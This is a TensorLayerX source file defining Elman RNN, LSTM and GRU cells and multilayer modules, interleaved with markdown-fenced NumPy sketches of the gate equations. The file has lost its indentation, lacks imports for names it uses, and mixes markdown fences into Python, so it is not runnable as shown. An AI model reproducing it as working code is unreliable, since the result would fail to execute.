from tensorlayerx.nn.core import Module
__all__ = [
'RNN',
'RNNCell',
'GRU',
'LSTM',
'GRUCell',
'LSTMCell',
]
class RNNCell(Module):
"""An Elman RNN cell with tanh or ReLU non-linearity.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
act : activation function
The non-linearity to use. Can be either 'tanh' or 'relu'. Default: 'tanh'
name : None or str
A unique layer name
Returns
----------
outputs : tensor
A tensor with shape `[batch_size, hidden_size]`.
states : tensor
A tensor with shape `[batch_size, hidden_size]`.
Tensor containing the next hidden state for each element in the batch
"""
def __init__(
self,
input_size,
hidden_size,
bias=True,
act='tanh',
name=None,
):
super(RNNCell, self).__init__(name)
self.input_size = input_size
self.hidden_size = hidden_size
self.bias = bias
if act not in ('relu', 'tanh'):
raise ValueError("Activation should be 'tanh' or 'relu'.")
self.act = act
self.build(None)
logging.info("RNNCell %s: input_size: %d hidden_size: %d act: %s" % (self.name, input_size, hidden_size, act))
def __repr__(self):
actstr = self.act
s = ('{classname}(input_size={input_size}, hidden_size={hidden_size}')
s += ', bias=True' if self.bias else ', bias=False'
s += (',' + actstr)
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def check_input(self, input_shape):
if input_shape[1] != self.input_size:
raise ValueError(
'input should have consistent input_size. But got {}, expected {}'.format(
input_shape[1], self.input_size
)
)
def check_hidden(self, input_shape, h_shape, hidden_label):
if input_shape[0] != h_shape[0]:
raise ValueError(
'input batch size{} should match hidden{} batch size{}.'.format(
input_shape[0], hidden_label, h_shape[0]
)
)
if h_shape[1] != self.hidden_size:
raise ValueError(
'hidden{} should have consistent hidden_size. But got {}, expected {}.'.format(
hidden_label, h_shape[1], self.hidden_size
)
)
def build(self, inputs_shape):
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
self.weight_ih_shape = (self.hidden_size, self.input_size)
self.weight_hh_shape = (self.hidden_size, self.hidden_size)
self.weight_ih = self._get_weights("weight_ih", shape=self.weight_ih_shape, init=_init)
self.weight_hh = self._get_weights("weight_hh", shape=self.weight_hh_shape, init=_init)
if self.bias:
self.bias_ih_shape = (self.hidden_size, )
self.bias_hh_shape = (self.hidden_size, )
self.bias_ih = self._get_weights('bias_ih', shape=self.bias_ih_shape, init=_init)
self.bias_hh = self._get_weights('bias_hh', shape=self.bias_hh_shape, init=_init)
else:
self.bias_ih = None
self.bias_hh = None
self.rnncell = tlx.ops.rnncell(
weight_ih=self.weight_ih, weight_hh=self.weight_hh, bias_ih=self.bias_ih, bias_hh=self.bias_hh, act=self.act
)
def forward(self, inputs, states=None):
"""
Parameters
----------
inputs : tensor
A tensor with shape `[batch_size, input_size]`.
states : tensor or None
A tensor with shape `[batch_size, hidden_size]`. When states is None, zero state is used. Defaults to None.
Examples
--------
With TensorLayerx
>>> input = tlx.nn.Input([4, 16], name='input')
>>> prev_h = tlx.nn.Input([4,32])
>>> cell = tlx.nn.RNNCell(input_size=16, hidden_size=32, bias=True, act='tanh', name='rnncell_1')
>>> y, h = cell(input, prev_h)
>>> print(y.shape)
"""
input_shape = tlx.get_tensor_shape(inputs)
self.check_input(input_shape)
if states is None:
states = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
states_shape = tlx.get_tensor_shape(states)
self.check_hidden(input_shape, states_shape, hidden_label='h')
output, states = self.rnncell(inputs, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(inputs, [output, states])
self._nodes_fixed = True
return output, states
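The cell above delegates to `tlx.ops.rnncell`, which implements the Elman update `h' = act(x·W_ih^T + b_ih + h·W_hh^T + b_hh)`. A NumPy sketch of that single step (shapes match the weights built in `build`; this is an illustration, not the backend kernel):

```python
import numpy as np

def rnn_cell_step(x, h, w_ih, w_hh, b_ih, b_hh, act=np.tanh):
    # x: (batch, input_size), h: (batch, hidden_size)
    # w_ih: (hidden_size, input_size), w_hh: (hidden_size, hidden_size)
    return act(x @ w_ih.T + b_ih + h @ w_hh.T + b_hh)
```

Both the output and the next state are this same tensor, which is why `forward` returns `(output, states)` with identical shapes `(batch, hidden_size)`.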
class LSTMCell(Module):
"""A long short-term memory (LSTM) cell.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
A tensor with shape `[batch_size, hidden_size]`.
states : tensor
A tuple of two tensor `(h, c)`, each of shape `[batch_size, hidden_size]`.
Tensors containing the next hidden state and next cell state for each element in the batch.
"""
def __init__(
self,
input_size,
hidden_size,
bias=True,
name=None,
):
super(LSTMCell, self).__init__(name)
self.input_size = input_size
self.hidden_size = hidden_size
self.bias = bias
self.build(None)
logging.info("LSTMCell %s: input_size: %d hidden_size: %d " % (self.name, input_size, hidden_size))
def __repr__(self):
s = ('{classname}(input_size={input_size}, hidden_size={hidden_size}')
s += ', bias=True' if self.bias else ', bias=False'
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def check_input(self, input_shape):
if input_shape[1] != self.input_size:
raise ValueError(
'input should have consistent input_size. But got {}, expected {}'.format(
input_shape[1], self.input_size
)
)
def check_hidden(self, input_shape, h_shape, hidden_label):
if input_shape[0] != h_shape[0]:
raise ValueError(
'input batch size{} should match hidden{} batch size{}.'.format(
input_shape[0], hidden_label, h_shape[0]
)
)
if h_shape[1] != self.hidden_size:
raise ValueError(
'hidden{} should have consistent hidden_size. But got {}, expected {}.'.format(
hidden_label, h_shape[1], self.hidden_size
)
)
def build(self, inputs_shape):
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
self.weight_ih_shape = (4 * self.hidden_size, self.input_size)
self.weight_hh_shape = (4 * self.hidden_size, self.hidden_size)
self.weight_ih = self._get_weights("weight_ih", shape=self.weight_ih_shape, init=_init)
self.weight_hh = self._get_weights("weight_hh", shape=self.weight_hh_shape, init=_init)
if self.bias:
self.bias_ih_shape = (4 * self.hidden_size, )
self.bias_hh_shape = (4 * self.hidden_size, )
self.bias_ih = self._get_weights('bias_ih', shape=self.bias_ih_shape, init=_init)
self.bias_hh = self._get_weights('bias_hh', shape=self.bias_hh_shape, init=_init)
else:
self.bias_ih = None
self.bias_hh = None
self.lstmcell = tlx.ops.lstmcell(
weight_ih=self.weight_ih, weight_hh=self.weight_hh, bias_ih=self.bias_ih, bias_hh=self.bias_hh
)
def forward(self, inputs, states=None):
"""
Parameters
----------
inputs : tensor
A tensor with shape `[batch_size, input_size]`.
states : tuple or None
A tuple of two tensor `(h, c)`, each of shape `[batch_size, hidden_size]`. When states is None, zero state is used. Defaults: None.
Examples
--------
With TensorLayerx
>>> input = tlx.nn.Input([4, 16], name='input')
>>> prev_h = tlx.nn.Input([4,32])
>>> prev_c = tlx.nn.Input([4,32])
>>> cell = tlx.nn.LSTMCell(input_size=16, hidden_size=32, bias=True, name='lstmcell_1')
>>> y, (h, c)= cell(input, (prev_h, prev_c))
>>> print(y.shape)
"""
input_shape = tlx.get_tensor_shape(inputs)
self.check_input(input_shape)
if states is not None:
h, c = states
else:
h = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
c = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
h_shape = tlx.get_tensor_shape(h)
c_shape = tlx.get_tensor_shape(c)
self.check_hidden(input_shape, h_shape, hidden_label='h')
self.check_hidden(input_shape, c_shape, hidden_label='c')
output, new_h, new_c = self.lstmcell(inputs, h, c)
if not self._nodes_fixed and self._build_graph:
self._add_node(inputs, [output, new_h, new_c])
self._nodes_fixed = True
return output, (new_h, new_c)
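# The (4 * hidden_size, input_size) and (4 * hidden_size, hidden_size) weight shapes built above
# stack the four LSTM gates into single matrices. A minimal NumPy sketch of one cell step,
# assuming the PyTorch-style gate order (i, f, g, o); `lstm_cell_step` and `sigmoid` are
# illustrative helpers, not part of TensorLayerX:

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def lstm_cell_step(x, h, c, W_ih, W_hh, b_ih, b_hh):
    # Stacked gates: rows [0:H] -> input gate i, [H:2H] -> forget gate f,
    # [2H:3H] -> cell candidate g, [3H:4H] -> output gate o.
    H = h.shape[-1]
    gates = x @ W_ih.T + h @ W_hh.T + b_ih + b_hh  # [batch, 4H]
    i = sigmoid(gates[:, 0:H])
    f = sigmoid(gates[:, H:2 * H])
    g = np.tanh(gates[:, 2 * H:3 * H])
    o = sigmoid(gates[:, 3 * H:4 * H])
    c_new = f * c + i * g
    h_new = o * np.tanh(c_new)
    return h_new, c_new

# Shapes mirror the docstring example: input_size=16, hidden_size=32, batch=4.
rng = np.random.default_rng(0)
x = rng.standard_normal((4, 16))
h = np.zeros((4, 32))
c = np.zeros((4, 32))
W_ih = rng.standard_normal((4 * 32, 16)) * 0.1
W_hh = rng.standard_normal((4 * 32, 32)) * 0.1
b_ih = np.zeros(4 * 32)
b_hh = np.zeros(4 * 32)
h_new, c_new = lstm_cell_step(x, h, c, W_ih, W_hh, b_ih, b_hh)
```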
class GRUCell(Module):
"""A gated recurrent unit (GRU) cell.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
A tensor with shape `[batch_size, hidden_size]`.
states : tensor
A tensor with shape `[batch_size, hidden_size]`, containing the next hidden state for each element in the batch.
"""
def __init__(
self,
input_size,
hidden_size,
bias=True,
name=None,
):
super(GRUCell, self).__init__(name)
self.input_size = input_size
self.hidden_size = hidden_size
self.bias = bias
self.build(None)
logging.info("GRUCell %s: input_size: %d hidden_size: %d " % (self.name, input_size, hidden_size))
def __repr__(self):
s = ('{classname}(input_size={input_size}, hidden_size={hidden_size}')
s += ', bias=True' if self.bias else ', bias=False'
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def check_input(self, input_shape):
if input_shape[1] != self.input_size:
raise ValueError(
'input should have consistent input_size. But got {}, expected {}'.format(
input_shape[1], self.input_size
)
)
def check_hidden(self, input_shape, h_shape, hidden_label):
if input_shape[0] != h_shape[0]:
raise ValueError(
'input batch size {} should match hidden {} batch size {}.'.format(
input_shape[0], hidden_label, h_shape[0]
)
)
if h_shape[1] != self.hidden_size:
raise ValueError(
'hidden {} should have a consistent hidden_size, but got {}, expected {}.'.format(
hidden_label, h_shape[1], self.hidden_size
)
)
def build(self, inputs_shape):
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
self.weight_ih_shape = (3 * self.hidden_size, self.input_size)
self.weight_hh_shape = (3 * self.hidden_size, self.hidden_size)
self.weight_ih = self._get_weights("weight_ih", shape=self.weight_ih_shape, init=_init)
self.weight_hh = self._get_weights("weight_hh", shape=self.weight_hh_shape, init=_init)
if self.bias:
self.bias_ih_shape = (3 * self.hidden_size, )
self.bias_hh_shape = (3 * self.hidden_size, )
self.bias_ih = self._get_weights('bias_ih', shape=self.bias_ih_shape, init=_init)
self.bias_hh = self._get_weights('bias_hh', shape=self.bias_hh_shape, init=_init)
else:
self.bias_ih = None
self.bias_hh = None
self.grucell = tlx.ops.grucell(
weight_ih=self.weight_ih, weight_hh=self.weight_hh, bias_ih=self.bias_ih, bias_hh=self.bias_hh
)
def forward(self, inputs, states=None):
"""
Parameters
----------
inputs : tensor
A tensor with shape `[batch_size, input_size]`.
states : tensor or None
A tensor with shape `[batch_size, hidden_size]`. When states is None, a zero state is used. Default: `None`.
Examples
--------
With TensorLayerX
>>> input = tlx.nn.Input([4, 16], name='input')
>>> prev_h = tlx.nn.Input([4, 32])
>>> cell = tlx.nn.GRUCell(input_size=16, hidden_size=32, bias=True, name='grucell_1')
>>> y, h = cell(input, prev_h)
>>> print(y.shape)
"""
input_shape = tlx.get_tensor_shape(inputs)
self.check_input(input_shape)
if states is None:
states = tlx.zeros(shape=(input_shape[0], self.hidden_size), dtype=inputs.dtype)
states_shape = tlx.get_tensor_shape(states)
self.check_hidden(input_shape, states_shape, hidden_label='h')
output, states = self.grucell(inputs, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(inputs, [output, states])
self._nodes_fixed = True
return output, states
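# The (3 * hidden_size, ...) weight shapes built above stack the three GRU gates into single
# matrices. A minimal NumPy sketch of one cell step, assuming the PyTorch-style gate order
# (r, z, n); `gru_cell_step` and `sigmoid` are illustrative helpers, not part of TensorLayerX:

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def gru_cell_step(x, h, W_ih, W_hh, b_ih, b_hh):
    # Stacked gates: rows [0:H] -> reset gate r, [H:2H] -> update gate z,
    # [2H:3H] -> candidate state n.
    H = h.shape[-1]
    gi = x @ W_ih.T + b_ih  # [batch, 3H]
    gh = h @ W_hh.T + b_hh
    r = sigmoid(gi[:, 0:H] + gh[:, 0:H])
    z = sigmoid(gi[:, H:2 * H] + gh[:, H:2 * H])
    n = np.tanh(gi[:, 2 * H:3 * H] + r * gh[:, 2 * H:3 * H])
    return (1.0 - z) * n + z * h

# Shapes mirror the docstring example: input_size=16, hidden_size=32, batch=4.
rng = np.random.default_rng(0)
x = rng.standard_normal((4, 16))
h = np.zeros((4, 32))
W_ih = rng.standard_normal((3 * 32, 16)) * 0.1
W_hh = rng.standard_normal((3 * 32, 32)) * 0.1
b_ih = np.zeros(3 * 32)
b_hh = np.zeros(3 * 32)
h_new = gru_cell_step(x, h, W_ih, W_hh, b_ih, b_hh)
```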
class RNNBase(Module):
"""
RNNBase class for RNN networks. It provides `forward` and other common methods for RNN, LSTM and GRU.
"""
def __init__(
self,
mode,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
name=None,
):
super(RNNBase, self).__init__(name)
self.mode = mode
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = num_layers
self.bias = bias
self.batch_first = batch_first
self.dropout = dropout
self.bidirectional = bidirectional
self.build(None)
logging.info(
"%s: %s: input_size: %d hidden_size: %d num_layers: %d " %
(self.mode, self.name, input_size, hidden_size, num_layers)
)
def __repr__(self):
s = (
'{classname}(input_size={input_size}, hidden_size={hidden_size}, num_layers={num_layers}'
', dropout={dropout}'
)
s += ', bias=True' if self.bias else ', bias=False'
s += ', bidirectional=True' if self.bidirectional else ', bidirectional=False'
if self.name is not None:
s += ', name=\'{name}\''
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def build(self, inputs_shape):
bidirect = 2 if self.bidirectional else 1
self.w_ih = []
self.w_hh = []
self.b_ih = []
self.b_hh = []
stdv = 1.0 / np.sqrt(self.hidden_size)
_init = tlx.nn.initializers.RandomUniform(minval=-stdv, maxval=stdv)
if self.mode == 'LSTM':
gate_size = 4 * self.hidden_size
elif self.mode == 'GRU':
gate_size = 3 * self.hidden_size
else:
gate_size = self.hidden_size
for layer in range(self.num_layers):
for direction in range(bidirect):
layer_input_size = self.input_size if layer == 0 else self.hidden_size * bidirect
suffix = '_reverse' if direction == 1 else ''
self.w_ih.append(
self._get_weights(
var_name='weight_ih_l{}{}'.format(layer, suffix), shape=(gate_size, layer_input_size),
init=_init
)
)
self.w_hh.append(
self._get_weights(
var_name='weight_hh_l{}{}'.format(layer, suffix), shape=(gate_size, self.hidden_size),
init=_init
)
)
if self.bias:
self.b_ih.append(
self._get_weights(
var_name='bias_ih_l{}{}'.format(layer, suffix), shape=(gate_size, ), init=_init
)
)
self.b_hh.append(
self._get_weights(
var_name='bias_hh_l{}{}'.format(layer, suffix), shape=(gate_size, ), init=_init
)
)
self.rnn = tlx.ops.rnnbase(
mode=self.mode, input_size=self.input_size, hidden_size=self.hidden_size, num_layers=self.num_layers,
bias=self.bias, batch_first=self.batch_first, dropout=self.dropout, bidirectional=self.bidirectional,
is_train=self.is_train, w_ih=self.w_ih, w_hh=self.w_hh, b_ih=self.b_ih, b_hh=self.b_hh
)
def forward(self, input, states=None):
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states
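# RNNBase.build names each per-layer, per-direction weight with the layer index and a `_reverse`
# suffix for the backward direction. A small pure-Python sketch enumerating the same naming
# scheme (assuming bias names are only created when `bias=True`, as in build above;
# `rnn_param_names` is an illustrative helper, not part of TensorLayerX):

```python
def rnn_param_names(num_layers, bidirectional, bias=True):
    """Enumerate weight variable names layer by layer, direction by direction."""
    names = []
    for layer in range(num_layers):
        for direction in range(2 if bidirectional else 1):
            suffix = '_reverse' if direction == 1 else ''
            names.append('weight_ih_l{}{}'.format(layer, suffix))
            names.append('weight_hh_l{}{}'.format(layer, suffix))
            if bias:
                names.append('bias_ih_l{}{}'.format(layer, suffix))
                names.append('bias_hh_l{}{}'.format(layer, suffix))
    return names

# A 2-layer bidirectional RNN with bias has 2 * 2 * 4 = 16 parameter tensors.
names = rnn_param_names(num_layers=2, bidirectional=True)
```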
class RNN(RNNBase):
"""Multilayer Elman network(RNN). It takes input sequences and initial
states as inputs, and returns the output sequences and the final states.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
num_layers : int
Number of recurrent layers. Default: 1
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
batch_first : bool
If ``True``, then the input and output tensors are provided as `[batch_size, seq, input_size]`, Default: ``False``
dropout : float
If non-zero, introduces a `Dropout` layer on the outputs of each RNN layer except the last layer,
with dropout probability equal to `dropout`. Default: 0
bidirectional : bool
If ``True``, becomes a bidirectional RNN. Default: ``False``
act : activation function
The non-linearity to use. Can be either 'tanh' or 'relu'. Default: 'tanh'
name : None or str
A unique layer name
Returns
----------
outputs : tensor
The output sequence. If `batch_first` is True, the shape is `[batch_size, seq, num_directions * hidden_size]`;
otherwise, the shape is `[seq, batch_size, num_directions * hidden_size]`.
final_states : tensor
The final states, with shape `[num_layers * num_directions, batch_size, hidden_size]`. Note that if the RNN is bidirectional, the forward states are at even indices (0, 2, 4, ...)
and the backward states at odd indices (1, 3, 5, ...).
"""
def __init__(
self,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
act='tanh',
name=None,
):
if act == 'tanh':
mode = 'RNN_TANH'
elif act == 'relu':
mode = 'RNN_RELU'
else:
raise ValueError("act should be in ['tanh', 'relu'], but got {}.".format(act))
super(RNN, self).__init__(mode, input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, name)
def forward(self, input, states=None):
"""
Parameters
----------
input : tensor
The input sequence. If `batch_first` is True, the shape is `[batch_size, seq, input_size]`; otherwise, the shape is `[seq, batch_size, input_size]`.
states : tensor or None
The initial states, with shape `[num_layers * num_directions, batch_size, hidden_size]`. If `states` is not given, zero initial states are used.
If the RNN is bidirectional, num_directions is 2; otherwise it is 1. Default: None.
Examples
--------
With TensorLayerX
>>> input = tlx.nn.Input([23, 32, 16], name='input')
>>> prev_h = tlx.nn.Input([4, 32, 32])
>>> cell = tlx.nn.RNN(input_size=16, hidden_size=32, bias=True, num_layers=2, bidirectional=True, act='tanh', batch_first=False, dropout=0, name='rnn_1')
>>> y, h = cell(input, prev_h)
>>> print(y.shape)
"""
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states
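# For mode='RNN_TANH' or 'RNN_RELU', each recurrent step is a single affine map through the
# chosen nonlinearity: h' = act(W_ih @ x + b_ih + W_hh @ h + b_hh). A minimal NumPy sketch of
# one such step (`elman_step` is an illustrative helper, not part of TensorLayerX):

```python
import numpy as np

def elman_step(x, h, W_ih, W_hh, b_ih, b_hh, act=np.tanh):
    # One Elman RNN step; gate_size equals hidden_size, so the weights are not stacked.
    return act(x @ W_ih.T + b_ih + h @ W_hh.T + b_hh)

# Shapes mirror the docstring example: input_size=16, hidden_size=32, batch=4.
rng = np.random.default_rng(0)
x = rng.standard_normal((4, 16))
h = np.zeros((4, 32))
W_ih = rng.standard_normal((32, 16)) * 0.1
W_hh = rng.standard_normal((32, 32)) * 0.1
b = np.zeros(32)
h_new = elman_step(x, h, W_ih, W_hh, b, b)
```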
class LSTM(RNNBase):
"""Applies a multi-layer long short-term memory (LSTM) RNN to an input sequence.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
num_layers : int
Number of recurrent layers. Default: 1
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
batch_first : bool
If ``True``, then the input and output tensors are provided as `[batch_size, seq, input_size]`, Default: ``False``
dropout : float
If non-zero, introduces a `Dropout` layer on the outputs of each LSTM layer except the last layer,
with dropout probability equal to `dropout`. Default: 0
bidirectional : bool
If ``True``, becomes a bidirectional LSTM. Default: ``False``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
The output sequence. If `batch_first` is True, the shape is `[batch_size, seq, num_directions * hidden_size]`;
otherwise, the shape is `[seq, batch_size, num_directions * hidden_size]`.
final_states : tuple
A tuple of two tensors `(h, c)`; the shape of each is `[num_layers * num_directions, batch_size, hidden_size]`. Note that if the LSTM is bidirectional, the forward states are at even indices (0, 2, 4, ...)
and the backward states at odd indices (1, 3, 5, ...).
"""
def __init__(
self,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
name=None,
):
super(LSTM, self).__init__('LSTM', input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, name)
def forward(self, input, states=None):
"""
Parameters
----------
input : tensor
The input sequence. If `batch_first` is True, the shape is `[batch_size, seq, input_size]`; otherwise, the shape is `[seq, batch_size, input_size]`.
states : tuple or None
The initial states: a tuple of tensors `(h, c)`, the shape of each being `[num_layers * num_directions, batch_size, hidden_size]`. If `states` is not given, zero initial states are used.
If the LSTM is bidirectional, num_directions is 2; otherwise it is 1. Default: None.
Examples
--------
With TensorLayerX
>>> input = tlx.nn.Input([23, 32, 16], name='input')
>>> prev_h = tlx.nn.Input([4, 32, 32])
>>> prev_c = tlx.nn.Input([4, 32, 32])
>>> cell = tlx.nn.LSTM(input_size=16, hidden_size=32, bias=True, num_layers=2, bidirectional=True, batch_first=False, dropout=0, name='lstm_1')
>>> y, (h, c) = cell(input, (prev_h, prev_c))
>>> print(y.shape)
"""
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states
class GRU(RNNBase):
"""Applies a multi-layer gated recurrent unit (GRU) RNN to an input sequence.
Parameters
----------
input_size : int
The number of expected features in the input `x`
hidden_size : int
The number of features in the hidden state `h`
num_layers : int
Number of recurrent layers. Default: 1
bias : bool
If ``False``, then the layer does not use bias weights `b_ih` and `b_hh`. Default: ``True``
batch_first : bool
If ``True``, then the input and output tensors are provided as `[batch_size, seq, input_size]`, Default: ``False``
dropout : float
If non-zero, introduces a `Dropout` layer on the outputs of each GRU layer except the last layer,
with dropout probability equal to `dropout`. Default: 0
bidirectional : bool
If ``True``, becomes a bidirectional GRU. Default: ``False``
name : None or str
A unique layer name
Returns
----------
outputs : tensor
The output sequence. If `batch_first` is True, the shape is `[batch_size, seq, num_directions * hidden_size]`;
otherwise, the shape is `[seq, batch_size, num_directions * hidden_size]`.
final_states : tensor
The final hidden state, with shape `[num_layers * num_directions, batch_size, hidden_size]`. Note that if the GRU is bidirectional, the forward states are at even indices (0, 2, 4, ...)
and the backward states at odd indices (1, 3, 5, ...).
"""
def __init__(
self,
input_size,
hidden_size,
num_layers=1,
bias=True,
batch_first=False,
dropout=0.0,
bidirectional=False,
name=None,
):
super(GRU, self).__init__('GRU', input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, name)
def forward(self, input, states=None):
"""
Parameters
----------
input : tensor
The input sequence. If `batch_first` is True, the shape is `[batch_size, seq, input_size]`; otherwise, the shape is `[seq, batch_size, input_size]`.
states : tensor or None
The initial hidden state, with shape `[num_layers * num_directions, batch_size, hidden_size]`. If `states` is not given, zero initial states are used.
If the GRU is bidirectional, num_directions is 2; otherwise it is 1. Default: None.
Examples
--------
With TensorLayerX
>>> input = tlx.nn.Input([23, 32, 16], name='input')
>>> prev_h = tlx.nn.Input([4, 32, 32])
>>> cell = tlx.nn.GRU(input_size=16, hidden_size=32, bias=True, num_layers=2, bidirectional=True, batch_first=False, dropout=0, name='GRU_1')
>>> y, h = cell(input, prev_h)
>>> print(y.shape)
"""
output, new_states = self.rnn(input, states)
if not self._nodes_fixed and self._build_graph:
self._add_node(input, [output, new_states])
self._nodes_fixed = True
return output, new_states